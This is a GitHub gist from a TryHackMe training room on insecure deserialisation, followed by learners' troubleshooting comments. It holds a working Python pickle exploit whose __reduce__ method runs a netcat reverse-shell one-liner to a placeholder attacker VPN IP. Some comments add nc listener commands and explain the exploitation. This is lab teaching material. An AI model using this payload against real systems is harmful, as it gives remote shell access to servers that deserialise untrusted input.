-
-
Save CMNatic/af5c19a8d77b4f5d8171340b9c560fc3 to your computer and use it in GitHub Desktop.
| import pickle | |
| import sys | |
| import base64 | |
| command = 'rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | netcat YOUR_TRYHACKME_VPN_IP 4444 > /tmp/f' | |
| class rce(object): | |
| def __reduce__(self): | |
| import os | |
| return (os.system,(command,)) | |
| print(base64.b64encode(pickle.dumps(rce()))) |
If anyone is on here with the same problem as debassanta, and you're using the THM AttackBox, nc won't pick up anything. What I had to do was set up a Kali on windows and then go through that. No idea why that worked. But it did.
Please i'm stock here for several days don't know what i'm doing wrong. Have try listening with nc with both ports nc -lvnp 4444 and nc -lvnp 1234 and refresh the browser no luck. I connected to the machine using the thm browser machine to kali. Also i don't seem to get/find the vpn IP. Please i need your help.
ThanksPut ifconfig in the console on your kali machine (it should be the eth0 controller with an IP of 10.10. something) and use that in the script. Hope it helps!
Hi, thanks for the reply. It worked.
Please i'm stock here for several days don't know what i'm doing wrong. Have try listening with nc with both ports nc -lvnp 4444 and nc -lvnp 1234 and refresh the browser no luck. I connected to the machine using the thm browser machine to kali. Also i don't seem to get/find the vpn IP. Please i need your help.
ThanksPut ifconfig in the console on your kali machine (it should be the eth0 controller with an IP of 10.10. something) and use that in the script. Hope it helps!
Thanks Mate, this works fine.
Arigato!
Thank you so much! Awesome room
Thanks mate!
Love that room! So much fun, so much knowledge ;)
The room is really nice but the shell to the listener doesnt work.
Thanks room! iam trying
This is a great room, and I have tried this on a kali machine as well as a remote linux mint connected on the VPN and I'm getting a 504 timeout error...is it possible that the VPN is hosing up the connection? Great room tho!
Cool room. Do not call your python script pickle.py :)
Hi so I got to the shell how do I locate the flag.txt I can only see requirements.txt?
I believe that you have removed rce.py with your last revision
Thanks @silv3rmat I have updated it. For some reason a VScode extension seems to be overwriting this gist -- I have disabled the extension for the meantime.
Good! I've got a bit surprised seeing all those json files instead of one python file. I've never used gists before so I thought that maybe I am supposed to build this file out of the jsons :D Anyways, great room. Thanks!
Still not showing the py file - for those who don't know, scroll to the top and select "revisions" and you can find it there if it's still now showing.
Thank for this room. It's a big one, but good introduction to a lot of interesting concepts.
Thank you for this room man! It really helped me :)
Thanks for your work on this room!
I am stuck on this. Any help would be great!!! Initially was running Kali on VM via Windows 10 and VM Player, so I used port 4444 and then switched to 1234 nc is not hearing anything. Redid the steps multiple times to no avail, then switched over to THM Attack Machine, and still getting the same issue. Note: used openvpn to connect using thm vpn config file when using the vm player, stopped openvpn when switching to thm attac machine. :-( Help please!
Thanks man, awesome room
Looks like your vscode has overwritten this gist again.
As someone paying for tryhackme I feel like maybe they should host this on AWS instead of a github link that seems to keep getting overwritten. I've been working through some of the rooms and they're riddled with errors and incomplete teachings on top of this.
Anyone seeing JSON files and wondering about the rce.py
You can find it in the 'Revisions' tab
Nice room, incredible !
hey there i think the required code has been over written - had to go back in revisions to get it
Anyone seeing JSON files and wondering about the rce.py
You can find it in the 'Revisions' tab
yep same here
Do not use a windows to run the py file ,payload including os info
Anyone seeing JSON files and wondering about the rce.py
You can find it in the 'Revisions' tab
Had the same issue.
Look at the very end of the page.
https://gist.github.com/CMNatic/af5c19a8d77b4f5d8171340b9c560fc3/revisions
@CMNatic Really loved the room, if anyone has trouble with the code I would recommend Learn Python 3 The Hard Way, it touches literally on everything the piece of python code does. We literally encode the commands for the reverse shell to a bytes like object which is then encoded in the base64 format. We take the encoded output, place it in the encodedPayload header and send it on its way. Since the Flask app does not have any sanitization and trusts all user input, it interprets this (performs deserialization) on the backend which allows us to get our reverse shell by interpreting the commands encoded.
It is really nice seeing everything coming together, amazing room, probably my favorite by far.
The OWASP 10 room is very cool. Thanks!
FYI 'can't access tty; job control turned off' isn't an error, it simply means that you can't use ctrl-c to kill the terminal. Use ls and cd commands to look for flag.txt, because you are probably in a terminal by now. Hope that isn't giving too much away.